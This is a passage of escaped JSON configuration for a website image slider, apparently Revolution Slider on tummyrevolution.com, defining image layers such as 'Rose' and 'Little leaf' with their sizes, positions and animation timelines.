From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1670,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1670,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":490,\"start\":3000,\"startRelative\":530,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"4\":{\"text\":\"Image 4\",\"alias\":\"Brown\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic6.png\",\"imageId\":3224},\"size\":{\"width\":{\"d\":{\"v\":\"1045px\",\"e\":true},\"n\":{\"v\":\"719px\",\"e\":true},\"t\":{\"v\":\"719px\"},\"m\":{\"v\":\"481px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"715px\",\"e\":true},\"n\":{\"v\":\"492px\",\"e\":true},\"t\":{\"v\":\"492px\"},\"m\":{\"v\":\"329px\",\"e\":true}},\"originalWidth\":1191,\"originalHeight\":815,\"aspectRatio\":{\"d\":{\"v\":1.4613496932515337},\"n\":{\"v\":1.4613496932515337},\"t\":{\"v\":1.4613496932515337},\"m\":{\"v\":1.4613496932515337}}},\"position\":{\"x\":{\"d\":{\"v\":\"-8px\",\"e\":true},\"n\":{\"v\":\"391px\",\"e\":true},\"t\":{\"v\":\"74px\",\"e\":true},\"m\":{\"v\":\"-169px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"173px\",\"e\":true},\"n\":{\"v\":\"26px\",\"e\":true},\"t\":{\"v\":\"141px\",\"e\":true},\"m\":{\"v\":\"79px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":490},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1770,\"start\":490,\"startRelative\":490},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1770,\"start\":490,\"startRelative\":490},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":480,\"start\":3000,\"startRelative\":740,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"2\":{\"text\":\"Image 2\",\"alias\":\"Rose\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic7.png\",\"imageId\":3223},\"size\":{\"width\":{\"d\":{\"v\":\"851px\",\"e\":true},\"n\":{\"v\":\"500px\",\"e\":true},\"t\":{\"v\":\"607px\",\"e\":true},\"m\":{\"v\":\"345px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"722px\",\"e\":true},\"n\":{\"v\":\"424px\",\"e\":true},\"t\":{\"v\":\"515px\",\"e\":true},\"m\":{\"v\":\"293px\",\"e\":true}},\"originalWidth\":851,\"originalHeight\":722,\"aspectRatio\":{\"d\":{\"v\":1.1786703601108033},\"n\":{\"v\":1.1786703601108033},\"t\":{\"v\":1.1786703601108033},\"m\":{\"v\":1.1786703601108033}}},\"position\":{\"x\":{\"d\":{\"v\":\"-75px\",\"e\":true},\"n\":{\"v\":\"441px\",\"e\":true},\"t\":{\"v\":\"-123px\",\"e\":true},\"m\":{\"v\":\"-139px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"105px\",\"e\":true},\"n\":{\"v\":\"79px\",\"e\":true},\"t\":{\"v\":\"99px\",\"e\":true},\"m\":{\"v\":\"81px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":590},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1670,\"start\":590,\"startRelative\":590},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1670,\"start\":590,\"startRelative\":590},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":460,\"start\":3000,\"startRelative\":740,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"7\":{\"text\":\"Image 7\",\"alias\":\"Cream\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic4-1.png\",\"imageId\":3231},\"size\":{\"width\":{\"d\":{\"v\":\"878px\",\"e\":true},\"n\":{\"v\":\"516px\",\"e\":true},\"t\":{\"v\":\"516px\",\"e\":true},\"m\":{\"v\":\"356px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"296px\",\"e\":true},\"n\":{\"v\":\"174px\",\"e\":true},\"t\":{\"v\":\"174px\",\"e\":true},\"m\":{\"v\":\"120px\",\"e\":true}},\"originalWidth\":878,\"originalHeight\":296,\"aspectRatio\":{\"d\":{\"v\":2.9662162162162162},\"n\":{\"v\":2.9662162162162162},\"t\":{\"v\":2.9662162162162162},\"m\":{\"v\":2.9662162162162162}}},\"position\":{\"x\":{\"d\":{\"v\":\"-90px\",\"e\":true},\"n\":{\"v\":\"382px\",\"e\":true},\"t\":{\"v\":\"32px\",\"e\":true},\"m\":{\"v\":\"-67px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"105px\",\"e\":true},\"n\":{\"v\":\"212px\",\"e\":true},\"t\":{\"v\":\"298px\",\"e\":true},\"m\":{\"v\":\"83px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":10,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":690},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1580,\"start\":690,\"startRelative\":690},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1580,\"start\":690,\"startRelative\":690},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":480,\"start\":3000,\"startRelative\":730,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"8\":{\"text\":\"Image 8\",\"alias\":\"Little leaf\",\"uid\":8,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic12.png\",\"imageId\":3232},\"size\":{\"width\":{\"d\":{\"v\":\"246px\",\"e\":true},\"n\":{\"v\":\"123px\",\"e\":true},\"t\":{\"v\":\"123px\",\"e\":true},\"m\":{\"v\":\"86px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"100px\",\"e\":true},\"n\":{\"v\":\"50px\",\"e\":true},\"t\":{\"v\":\"50px\",\"e\":true},\"m\":{\"v\":\"35px\",\"e\":true}},\"originalWidth\":246,\"originalHeight\":100,\"aspectRatio\":{\"d\":{\"v\":2.46},\"n\":{\"v\":2.46},\"t\":{\"v\":2.46},\"m\":{\"v\":2.46}}},\"position\":{\"x\":{\"d\":{\"v\":\"241px\",\"e\":true},\"n\":{\"v\":\"351px\",\"e\":true},\"t\":{\"v\":\"174px\",\"e\":true},\"m\":{\"v\":\"158px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"71px\",\"e\":true},\"n\":{\"v\":\"286px\",\"e\":true},\"t\":{\"v\":\"87px\",\"e\":true},\"m\":{\"v\":\"77px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":11,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":850},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1900,\"start\":850,\"startRelative\":850},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1900,\"start\":850,\"startRelative\":850},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim 